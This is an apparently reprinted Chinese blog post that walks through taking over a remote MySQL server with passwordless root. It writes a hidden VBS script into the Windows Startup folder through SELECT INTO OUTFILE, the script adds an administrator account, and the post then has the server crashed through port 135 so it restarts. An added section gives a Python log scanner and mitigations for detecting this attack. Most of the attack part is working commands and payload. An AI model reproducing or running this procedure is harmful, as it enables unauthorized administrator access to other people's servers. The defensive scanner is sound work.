Reprint
http://www.sevenline.org/blogview.asp?logid=265
I have also seen a few other ways of using this vulnerability. They usually write an ASP or PHP backdoor, which is not only cumbersome but also requires guessing the site's web root, and if the target is not running IIS at all, what then?
Later I thought of another approach, and it has worked on several machines I tested. Here it is:
1. Connect to the remote MySQL server
mysql -u root -h 192.168.0.1
mysql.exe is found in the bin directory of the MySQL installation.
2. See which databases the server has
mysql> show databases;
A fresh MySQL installation has two databases, mysql and test; any other databases you see were created after installation.
3. Enter the test database
mysql> use test;
We are now inside the test database.
4. What tables does this database contain?
mysql> show tables;
By default test contains no tables at all.
The following is the key part.
5. Create a new table in the test database
mysql> create table a (cmd text);
We have created a table named a with a single field, cmd, of type text.
6. Insert rows into the table
mysql> insert into a values ("set wshshell=createobject(""wscript.shell"")");
mysql> insert into a values ("a=wshshell.run(""cmd.exe /c net user zjl317 zjl317 /add"",0)");
mysql> insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup administrators zjl317 /add"",0)");
Pay attention to the doubled double quotes, the parentheses and the trailing "0"! These three rows will become a VBS script.
7. Now let's look at what table a contains.
mysql> select * from a;
We should see the three rows we just inserted. Once the content is confirmed correct, move on to the next step.
8. Write the table out as a VBS script file
mysql> select * from a into outfile "c:/docume~1/alluse~1/「Start」Menu/Programs/Startup/a.vbs";
This writes the contents of the table into the Startup group as a VBS script. Note the 「」 brackets: on a Chinese-language Windows install they are part of the actual folder name, and the English folder names above stand in for the localized ones.
9. By now everyone will have understood: we simply use MySQL to write out an executable file. Why VBS rather than a batch file? A batch file pops up a visible DOS window when it runs, whereas a VBS script can hide the window completely and produce no error messages. Ideally the script would end with a line that deletes itself once it has run, but the Chinese directory name could not be handled, so that was left out. Finally, use some tool against port 135 to make the server restart; a few minutes later you will have an administrator account.
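From the defender's side, the whole procedure above leaves a very recognisable trail in MySQL's general query log: a root connection from a remote host, followed by a SELECT ... INTO OUTFILE whose target path is an autostart folder and whose extension is executable. The following script is an added example, not part of the original post; it scans general-log-style lines for exactly that pattern. The log lines, host addresses and paths in it are constructed for the example, and the autostart folder hints and extension list are my own assumptions about what a Windows host runs at logon.

```python
"""Scan MySQL general-query-log lines for server-side file writes that land
in a Windows autostart folder.  Added example; the sample log below is
constructed, not a real capture."""
import re

# Statements that make mysqld write a file on its own host.
FILE_WRITE_RE = re.compile(
    r"\binto\s+(outfile|dumpfile)\s+['\"]([^'\"]+)['\"]", re.IGNORECASE)

# Connect records in the general log look like "Connect  user@host on".
CONNECT_RE = re.compile(r"\bConnect\s+(\S+?)@(\S+)\s+on\b")

# Path fragments that point at a logon/boot autostart location (assumption;
# 8.3 short names included because the post uses DOCUME~1 / ALLUSE~1).
AUTOSTART_HINTS = ("startup", "start menu", "startmenu", "/启动", "\\启动",
                   "programs\\startup", "alluse~1")

# Extensions Windows will execute when dropped in such a folder (assumption).
EXEC_EXTS = (".vbs", ".bat", ".cmd", ".exe", ".js", ".wsf", ".ps1", ".hta")

def classify_line(line):
    """Return (severity, reason) for one general-log line, or None if benign."""
    m = CONNECT_RE.search(line)
    if m:
        user, host = m.group(1), m.group(2)
        # root logging in over the network is the precondition for the whole attack.
        if user == "root" and host not in ("localhost", "127.0.0.1"):
            return ("medium", f"remote root login from {host}")
        return None
    m = FILE_WRITE_RE.search(line)
    if not m:
        return None
    verb, path = m.group(1).upper(), m.group(2).replace("\\\\", "\\")
    low = path.lower()
    in_autostart = any(hint in low for hint in AUTOSTART_HINTS)
    executable = low.endswith(EXEC_EXTS)
    if in_autostart and executable:
        return ("high", f"executable {path!r} written into an autostart folder")
    if executable:
        return ("medium", f"executable file written via {verb}: {path!r}")
    return ("low", f"server-side file write via {verb}: {path!r}")

def scan(lines):
    """Return [(line_no, severity, reason)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        res = classify_line(line)
        if res:
            hits.append((n, res[0], res[1]))
    return hits

# Constructed sample of a MySQL general query log (not a real capture).
SAMPLE_LOG = [
    "090312 10:01:02     3 Connect   root@192.168.0.5 on",
    "090312 10:01:05     3 Query     show databases",
    "090312 10:01:20     3 Query     create table a (cmd text)",
    "090312 10:02:10     3 Query     select * from a into outfile "
    "'c:/docume~1/alluse~1/start menu/programs/startup/a.vbs'",
    "090312 10:05:00     4 Connect   webapp@localhost on",
    "090312 10:05:01     4 Query     select * from orders into outfile '/tmp/orders.csv'",
]

if __name__ == "__main__":
    for n, sev, why in scan(SAMPLE_LOG):
        print(f"line {n}: [{sev}] {why}")
```

Run against the constructed sample it flags the remote root login as medium, the a.vbs write into the Startup folder as high, and the CSV export as a low-severity informational hit. The detection only works if the general log (or audit plugin) is on; the mitigations that remove the attack surface in the first place are a root password plus no root login from remote hosts, a bind-address that keeps mysqld off the public interface, secure_file_priv pointing at a dedicated directory so INTO OUTFILE cannot reach system folders, and running mysqld under an unprivileged service account rather than SYSTEM.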